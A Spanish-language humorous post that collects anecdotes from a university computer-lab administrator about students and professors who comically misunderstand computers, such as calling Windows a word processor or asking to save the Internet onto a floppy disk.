Saludos!
cualquier parecido con la realidad  es…………….. LA NETA¡¡¡¡¡¡¡¡ Se que algunos de ustedes no son SemiDioses, es decir gente de sistemas,  pero por lo menos aprendanse de memoria la situacion, para no ser como el  alumno de estos dialogos…Estas son las escalofriantes declaraciones de un administrador que estaba a cargo del mantenimiento de las salas de computo en una Universidad Publica.

Son todas estrictamente veridicas, aunque pueda  parecer increible. Hay que tener en cuenta que la sala de la que se hacia cargo  estaba en la Facultad  de Empresariales, de modo que no se esperaba de los usuarios la posesion  de una vasta cultura informatica.

Pero tampoco se esperaban cosas como estas.   (Nota: Para salvaguardar la identidad de este “opereta”, usaremos el nombre generico de ROY para referirnos a el)

Alumno: “Hice este documento en casa, pero aqui no me carga”
Roy: “Bien. Que procesador de textos usaste?”
Alumno: “Windows, version 6″
Roy: “No, quiero decir que programa, no el sistema  operativo”
Alumno: “Windows”
Roy: “No. Windows es el sistema. Lo que quiero saber es el programa. Por ejemplo, puede haber sido WordPerfect, o Microsoft  Word…” [al alumno se le ilumina la cara]
Alumno: “Ah, claro! Fue con Microsoft Windows”  [aun no se como no lo mate]

Alumno: “No se si mi computadora pasara el 2000 y  estoy preocupado”
Roy: “Que modelo es?”
Alumno: “Es una Compaq”
Roy: “Buena marca, pero que modelo es?”
Alumno: “Ah!, es de las que les cabe el disquito de  3 no se que” [este sera uno de esos dias muuuuy largos]

Alumno: “Me puedes grabar Internet en este  disquete?”  [tentado estuve de grabarle el "acceso directo  a Internet  Explorer" y hacerle feliz...]

Alumno: “No jala mi password en mi cuenta, me salen  asteroides”  [me lleve un par de tensos segundos darme  cuenta de que  queria decir "asteriscos"]

Profesor: “En la casa quise instalar una impresora y no pude, ¿Me puedes ayudar?

Roy: ¿Que tipo de impresora es? Negro o a color  [uno preguntapara saber a que es lo que se va a enfrentar]

Profesor:  mmmh, es mas bien como color beige?? [completamente fuera de competencia :S]

Profesor: “Oye, en la sala de arriba queremos pasar  nuestros documentos a un nuevo sistema. Es muy complicado?”
Roy: “Depende. Que software estan usando?”  [expresion confusa en la cara  del profe]
Profesor: “Software? No usamos ningun software”  [genial; computadoras telepatas... y yo aqui con una Ultra  Sparc en la mesa]

Alumno: “Oye, valdria la pena instalar Windows 75?”  [esto es retro-computacion, y lo demas son  chingaderas]
Alumno: “Por que no aparece nada en internet?”
Roy: “Dejame ver… el servidor de red no esta  funcionando. Tendras que esperar un rato que lo levanten”
Alumno: “Bueno, mientras leere mis mails”  [que parte de "no esta funcionando" no explique bien? o  sera influyente?]

Alumno: “Necesito pasar esta imagen a mi cuenta para  un trabajo”
Roy: “Hecho!, te la paso por FTP en un momento”
Alumno: “No, no manches!, la imagen tiene que estar  en JPEG” [siempre he dicho que eso de los acronimos es un peligro  publico...]

Alumno: “Mi CPU no es lento, tiene un disco duro de 200 kegabytes”
[tres patadas en 12 palabras... deberia haber  mandado esto  al libro Guinness para que homologaran el  record]

Alumno: “Oye, Windows no me funciona, no se por que.
Habra sido por  cambiar el nombre del directorio WINDOWS a VENTANAS?” [nooo, sera la fase de la luna, pues se encuentra en laoctava casa de acuario....]

Alumno: “Se puede usar Word en las computadoras del Departamento?” [nota: eran estaciones Sun]
Roy: “No, esas maquinas usan UNIX”
Alumno: “Ah, claro, UNIX usa una version de DOS muy  antigua” [confieso que me costo recuperarme de esta]

Alumno: “Como puedo quitar mi PC del escritorio?”
Roy [confundido]: “Que pasa, esta atornillado a la  mesa o que?”
Alumno: “Me estas chamaqueando o que?”
Roy [mas confundido]: “No, no, como crees?… a ver,  donde quieres poner
tu PC? En el suelo?”
Alumno: “Te estas burlando de mi no?” eh? ?? ME ESTAS VACILANDO, NO??”
Roy [a la defensiva]: “Tranquilo, vamos por partes, eh? Me puedes explicar el problema con un poco mas de detalle?”
Alumno [mirandome como si yo fuera un idiota profundo]: “He quitado Internet, he quitado el Outlook y he quitado Mis  Documentos, pero no puedo quitar Mi PC. Ni la Papelera de Reciclaje tampoco”  [por que la gente no hablara con comillas?]

Alumno: “Oye, creo que hay archivos corrompidos en la computadora con la que trabajo”
Roy: “Por que crees eso?”
Alumno: “Lo abro y sale basura. Mira” [acto seguido  me lleva a una computadora, arranca MSDOS, lanza el EDIT y  abre... COMMAND.COM]
Roy [sonrisa sarcastica]: “Estoy de acuerdo en que es basura, pero…”  [me parece que no capto el chiste]

Alumno: “Me puedes ayudar? Se trabo la maquina y no  puedo escribir”
Roy: “Abriste algun archivo o paquete ademas del que  estas usando para escribir?” [hay que ponerse al nivel]
Alumno: “Abri Mis Documentos pero ya lo cerre y no me deja”
Roy: “Bien, selecciona la ventana con el programa en  que estabas escribiendo y podras continuar”
Alumno: “Es que no hay nada mas abierto, no hay mas cosas entre las cuales deba escoger” [me preocupare cuando el problema realmente sea  la maquina y  no el usuario]

Alumno: “Mi maquina se apago sin que la tocar”
Roy: “Como?”
Alumno: “Si, en lo que leia mis apuntes el monitor  se apago”  [muevo el mause y se enciende el monitor...  habia sido presa  del protector de pantalla maligno]

En cierta ocasion estaba enseñando los servidores  departamentales a un grupo de alumnos de primer curso… habia un DG 300 como servidor de terminales, donde se conectaban clientes bajo NT, X Window, y otros entornos]
Roy: “Y esto es un servidor DG 300 corriendo bajo DG/UX 5.4″
Alumno: “Que es eso?”
Roy: “El sistema operativo”
Alumno: “Corre bajo NT?”
Roy: “No, es DG/UX, un sistema operativo. Es una  variante de UNIX.Corre por si solo”
Alumno: “Ah, o sea, arrancas NT y…”  [este imbecil seguro que ha hecho carrera como empleado de  Microsoft]

Alumno: “Apague la computadora, la volvi a encender, y me sigue diciendo que ya puedo apagar la computadora”
Roy: “Eso es imposible”
Alumno: “Te lo juro, ven a verlo” [vamos hacia alla]
Alumno: “Mira. Apago . Enciendo …

Roy: “Ese es el monitor”. [imbecil.....]